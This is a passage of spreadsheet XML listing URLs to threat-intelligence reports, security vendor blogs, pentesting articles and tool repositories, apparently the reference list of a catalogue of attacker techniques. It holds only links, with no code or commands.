    <t>https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/</t>
  </si>
  <si>
    <t>https://wunderwuzzi23.github.io/blog/passthecookie.html</t>
  </si>
  <si>
    <t>https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html</t>
  </si>
  <si>
    <t>https://www.passcape.com/index.php?section=docsys&amp;cmd=details&amp;id=23</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/</t>
  </si>
  <si>
    <t>https://github.com/inguardians/peirates</t>
  </si>
  <si>
    <t>https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/</t>
  </si>
  <si>
    <t>https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019</t>
  </si>
  <si>
    <t>https://pentestlab.blog/2017/04/19/stored-credentials/</t>
  </si>
  <si>
    <t>https://pentestlab.blog/2017/04/03/token-manipulation/</t>
  </si>
  <si>
    <t>https://linuxhint.com/list-usb-devices-linux/</t>
  </si>
  <si>
    <t>https://ss64.com/osx/system_profiler.html</t>
  </si>
  <si>
    <t>https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5</t>
  </si>
  <si>
    <t>https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008</t>
  </si>
  <si>
    <t>https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/</t>
  </si>
  <si>
    <t>https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment</t>
  </si>
  <si>
    <t>http://phrack.org/issues/51/8.html</t>
  </si>
  <si>
    <t>https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html</t>
  </si>
  <si>
    <t>https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/power-platform/admin/block-forwarded-email-from-power-automate</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1</t>
  </si>
  <si>
    <t>http://www.powershellmagazine.com/2014/07/08/powersploit/</t>
  </si>
  <si>
    <t>http://powersploit.readthedocs.io</t>
  </si>
  <si>
    <t>https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1</t>
  </si>
  <si>
    <t>https://github.com/mattifestation/PowerSploit</t>
  </si>
  <si>
    <t>https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/</t>
  </si>
  <si>
    <t>https://github.com/prekageo/winhook</t>
  </si>
  <si>
    <t>https://www.prevailion.com/darkwatchman-new-fileless-techniques/</t>
  </si>
  <si>
    <t>https://www.prevailion.com/phantom-in-the-command-shell-2/</t>
  </si>
  <si>
    <t>http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf</t>
  </si>
  <si>
    <t>https://github.com/processhacker/processhacker</t>
  </si>
  <si>
    <t>https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf</t>
  </si>
  <si>
    <t>https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx</t>
  </si>
  <si>
    <t>http://windowsitpro.com/systems-management/psexec</t>
  </si>
  <si>
    <t>https://purplesec.us/data-loss-prevention/</t>
  </si>
  <si>
    <t>https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/</t>
  </si>
  <si>
    <t>https://pypi.org/project/rarfile/</t>
  </si>
  <si>
    <t>https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/</t>
  </si>
  <si>
    <t>https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware</t>
  </si>
  <si>
    <t>https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html</t>
  </si>
  <si>
    <t>http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html</t>
  </si>
  <si>
    <t>https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6</t>
  </si>
  <si>
    <t>https://github.com/stascorp/rdpwrap</t>
  </si>
  <si>
    <t>https://tools.ietf.org/html/rfc1918</t>
  </si>
  <si>
    <t>https://tools.ietf.org/html/rfc826</t>
  </si>
  <si>
    <t>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing</t>
  </si>
  <si>
    <t>https://github.com/dirkjanm/ROADtools</t>
  </si>
  <si>
    <t>https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf</t>
  </si>
  <si>
    <t>https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf</t>
  </si>
  <si>
    <t>https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe</t>
  </si>
  <si>
    <t>https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf</t>
  </si>
  <si>
    <t>https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf</t>
  </si>
  <si>
    <t>https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf</t>
  </si>
  <si>
    <t>https://blog.radware.com/security/2018/07/micropsia-malware/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/</t>
  </si>
  <si>
    <t>https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/</t>
  </si>
  <si>
    <t>https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response</t>
  </si>
  <si>
    <t>https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/</t>
  </si>
  <si>
    <t>https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence</t>
  </si>
  <si>
    <t>https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/</t>
  </si>
  <si>
    <t>https://rclone.org</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/rclone-mega-extortion/</t>
  </si>
  <si>
    <t>https://support.apple.com/en-us/HT204005</t>
  </si>
  <si>
    <t>https://www.ready.gov/business/implementation/IT</t>
  </si>
  <si>
    <t>https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/</t>
  </si>
  <si>
    <t>https://reaqta.com/2017/12/mavinject-microsoft-injector/</t>
  </si>
  <si>
    <t>https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/</t>
  </si>
  <si>
    <t>https://www.recordedfuture.com/chinese-mss-behind-apt3/</t>
  </si>
  <si>
    <t>https://www.recordedfuture.com/identifying-cobalt-strike-servers/</t>
  </si>
  <si>
    <t>https://www.recordedfuture.com/cobalt-strike-servers/</t>
  </si>
  <si>
    <t>https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf</t>
  </si>
  <si>
    <t>https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf</t>
  </si>
  <si>
    <t>https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf</t>
  </si>
  <si>
    <t>https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan</t>
  </si>
  <si>
    <t>https://www.recordedfuture.com/turla-apt-infrastructure/</t>
  </si>
  <si>
    <t>https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf</t>
  </si>
  <si>
    <t>https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/cor_profiler-for-persistence/</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/</t>
  </si>
  <si>
    <t>https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/</t>
  </si>
  <si>
    <t>https://redcanary.com/threat-detection-report/threats/qbot/</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/clipping-silver-sparrows-wings/</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/verclsid-exe-threat-detection/</t>
  </si>
  <si>
    <t>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/blue-mockingbird-cryptominer/</t>
  </si>
  <si>
    <t>https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse</t>
  </si>
  <si>
    <t>https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/</t>
  </si>
  <si>
    <t>http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/detections/osx-thiefquest/</t>
  </si>
  <si>
    <t>https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/</t>
  </si>
  <si>
    <t>https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html</t>
  </si>
  <si>
    <t>https://support.apple.com/en-us/HT209161</t>
  </si>
  <si>
    <t>https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python</t>
  </si>
  <si>
    <t>https://flylib.com/books/en/4.395.1.192/1/</t>
  </si>
  <si>
    <t>https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html</t>
  </si>
  <si>
    <t>https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/</t>
  </si>
  <si>
    <t>https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis</t>
  </si>
  <si>
    <t>https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/</t>
  </si>
  <si>
    <t>https://github.com/RhinoSecurityLabs/ccat</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration</t>
  </si>
  <si>
    <t>https://riskiq.com/blog/labs/magecart-british-airways-breach/</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/cobalt-strike/</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/magecart-newegg/</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/</t>
  </si>
  <si>
    <t>https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/</t>
  </si>
  <si>
    <t>https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/how-malware-persists-on-macos/</t>
  </si>
  <si>
    <t>https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf</t>
  </si>
  <si>
    <t>https://github.com/clarketm/s3recon</t>
  </si>
  <si>
    <t>https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</t>
  </si>
  <si>
    <t>https://redsiege.com/kerberoast-slides</t>
  </si>
  <si>
    <t>https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm</t>
  </si>
  <si>
    <t>http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840</t>
  </si>
  <si>
    <t>https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051</t>
  </si>
  <si>
    <t>https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/</t>
  </si>
  <si>
    <t>http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass</t>
  </si>
  <si>
    <t>https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf</t>
  </si>
  <si>
    <t>https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf</t>
  </si>
  <si>
    <t>https://www.sec.gov/edgar/search-and-access</t>
  </si>
  <si>
    <t>https://securelist.com/whos-really-spreading-through-the-bright-star/68978/</t>
  </si>
  <si>
    <t>https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html</t>
  </si>
  <si>
    <t>https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/</t>
  </si>
  <si>
    <t>https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/</t>
  </si>
  <si>
    <t>http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx</t>
  </si>
  <si>
    <t>https://www.ssh.com/ssh/authorized_keys/</t>
  </si>
  <si>
    <t>https://www.ssh.com/ssh</t>
  </si>
  <si>
    <t>https://www.ssh.com/ssh/tunneling</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh</t>
  </si>
  <si>
    <t>https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf</t>
  </si>
  <si>
    <t>https://www.sslshopper.com/ssl-checker.html</t>
  </si>
  <si>
    <t>https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383</t>
  </si>
  <si>
    <t>https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779</t>
  </si>
  <si>
    <t>https://wiki.samba.org/index.php/DRSUAPI</t>
  </si>
  <si>
    <t>https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411</t>
  </si>
  <si>
    <t>https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667</t>
  </si>
  <si>
    <t>http://windowsitpro.com/windows/netexe-reference</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</t>
  </si>
  <si>
    <t>https://www.se.com/ww/en/download/document/SESN-2018-236-01/</t>
  </si>
  <si>
    <t>https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/</t>
  </si>
  <si>
    <t>https://twitter.com/PyroTek3/status/1126487227712921600/photo/1</t>
  </si>
  <si>
    <t>https://sectools.org/tool/nbtscan/</t>
  </si>
  <si>
    <t>http://seclists.org/fulldisclosure/2015/Dec/34</t>
  </si>
  <si>
    <t>http://www.secpod.com/blog/winexe/</t>
  </si>
  <si>
    <t>https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3</t>
  </si>
  <si>
    <t>https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET</t>
  </si>
  <si>
    <t>https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html</t>
  </si>
  <si>
    <t>https://securelist.com/bad-rabbit-ransomware/82851/</t>
  </si>
  <si>
    <t>https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/</t>
  </si>
  <si>
    <t>https://securelist.com/the-silence/83009/</t>
  </si>
  <si>
    <t>https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/bronze-mohawk</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/bronze-union</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/the-curious-case-of-mia-ash</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/nickel-gladstone</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/wcry-ransomware-analysis</t>
  </si>
  <si>
    <t>https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#:~:text=Electronic%20Arts%20hacked%20through%20Slack%20channel&amp;text=In%20total%2C%20the%20hackers%20claim,credentials%20over%20a%20Slack%20channel.</t>
  </si>
  <si>
    <t>https://securelist.com/apt-trends-report-q1-2018/85280/</t>
  </si>
  <si>
    <t>https://securelist.com/apt-trends-report-q2-2017/79332/</t>
  </si>
  <si>
    <t>https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/</t>
  </si>
  <si>
    <t>https://securelist.com/agent-btz-a-source-of-inspiration/58551/</t>
  </si>
  <si>
    <t>https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/</t>
  </si>
  <si>
    <t>https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/</t>
  </si>
  <si>
    <t>https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/</t>
  </si>
  <si>
    <t>https://securelist.com/the-tetrade-brazilian-banking-malware/97779/</t>
  </si>
  <si>
    <t>https://securelist.com/calisto-trojan-for-macos/86543/</t>
  </si>
  <si>
    <t>https://securelist.com/darkvishnya/89169/</t>
  </si>
  <si>
    <t>https://securelist.com/darkhotels-attacks-in-2015/71713/</t>
  </si>
  <si>
    <t>https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/</t>
  </si>
  <si>
    <t>https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/</t>
  </si>
  <si>
    <t>https://securelist.com/the-dropping-elephant-actor/75328/</t>
  </si>
  <si>
    <t>https://securelist.com/my-name-is-dtrack/93338/</t>
  </si>
  <si>
    <t>https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/</t>
  </si>
  <si>
    <t>https://securelist.com/evolution-of-jsworm-ransomware/102428/</t>
  </si>
  <si>
    <t>https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/</t>
  </si>
  <si>
    <t>https://securelist.com/luckymouse-hits-national-data-center/86083/</t>
  </si>
  <si>
    <t>https://securelist.com/el-machete/66108/</t>
  </si>
  <si>
    <t>https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/</t>
  </si>
  <si>
    <t>https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/</t>
  </si>
  <si>
    <t>https://securelist.com/muddywater/88059/</t>
  </si>
  <si>
    <t>https://securelist.com/octopus-infested-seas-of-central-asia/88200/</t>
  </si>
  <si>
    <t>https://securelist.com/chafer-used-remexi-malware/89538/</t>
  </si>
  <si>
    <t>https://securelist.com/operation-daybreak/75100/</t>
  </si>
  <si>
    <t>https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/</t>
  </si>
  <si>
    <t>https://securelist.com/shadowpad-in-corporate-networks/81432/</t>
  </si>
  <si>
    <t>https://securelist.com/a-slice-of-2017-sofacy-activity/83930/</t>
  </si>
  <si>
    <t>https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</t>
  </si>
  <si>
    <t>https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/</t>
  </si>
  <si>
    <t>https://securelist.com/introducing-whitebear/81638/</t>
  </si>
  <si>
    <t>https://securelist.com/fileless-attacks-against-enterprise-networks/77403/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/bronze-huntley</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/bronze-president-targets-ngos</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/cobalt-illusion</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/copper-fieldstone</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/gold-cabin</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/gold-niagara</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/gold-southfield</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/revil-the-gandcrab-connection</t>
  </si>
  <si>
    <t>http://www.secureworks.com/research/threat-profiles/iron-hemlock</t>
  </si>
  <si>
    <t>http://www.secureworks.com/research/threat-profiles/iron-hunter</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/iron-ritual</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/iron-tilden</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/iron-twilight-supports-active-measures</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/iron-twilight</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-profiles/iron-viking</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/mcmd-malware-analysis</t>
  </si>
  <si>
